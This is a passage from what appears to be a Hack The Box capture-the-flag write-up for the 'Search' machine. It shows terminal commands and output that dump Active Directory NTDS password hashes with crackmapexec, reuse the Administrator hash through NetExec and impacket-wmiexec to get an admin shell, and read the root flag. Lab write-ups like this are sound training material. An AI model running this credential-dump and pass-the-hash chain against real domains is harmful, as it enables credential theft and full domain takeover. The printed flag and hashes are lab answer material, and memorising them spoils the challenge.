└─$ crackmapexec smb $ip -u TRISTAN.DAVIES -p 'P@ssword123!' --ntds
SMB 10.10.11.129 445 RESEARCH [+] search.htb\TRISTAN.DAVIES:P@ssword123! (Pwn3d!)
SMB 10.10.11.129 445 RESEARCH [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.10.11.129 445 RESEARCH Administrator:500:aad3b435b51404eeaad3b435b51404ee:5e3c0abbe0b4163c56xxxxxxxxxxxx:::
SMB 10.10.11.129 445 RESEARCH Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.11.129 445 RESEARCH krbtgt:502:aad3b435b51404eeaad3b435b51404ee:cd69d23e4383daa5b0f42d29dba9529a:::
SMB 10.10.11.129 445 RESEARCH search.htb\Santino.Benjamin:1194:aad3b435b51404eeaad3b435b51404ee:5e3c0abbe0b4163c5612afe25c69ced6:::
<snip>Get the flag with NetExec
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ nxc smb $ip -u administrator -H 5e3c0abbe0b4163c56xxxxxxxxxxxx -x 'type C:\Users\Administrator\Desktop\root.txt'
SMB 10.10.11.129 445 RESEARCH [+] search.htb\administrator:5e3c0abbe0b4xxxxxxxxxx163c56x (Pwn3d!)
SMB 10.10.11.129 445 RESEARCH [+] Executed command via wmiexec
SMB 10.10.11.129 445 RESEARCH b2f761828983df3ff185cdc96604225dOr access the machine with wmiexec.py
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ impacket-wmiexec search.htb/administrator@$ip -hashes :5e3c0abbe0b4163c56xxxxxxxxxxx
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
search\administratorRoot Flag: b2f761828983df3ffxxxxxxxxxxxxx
Last updated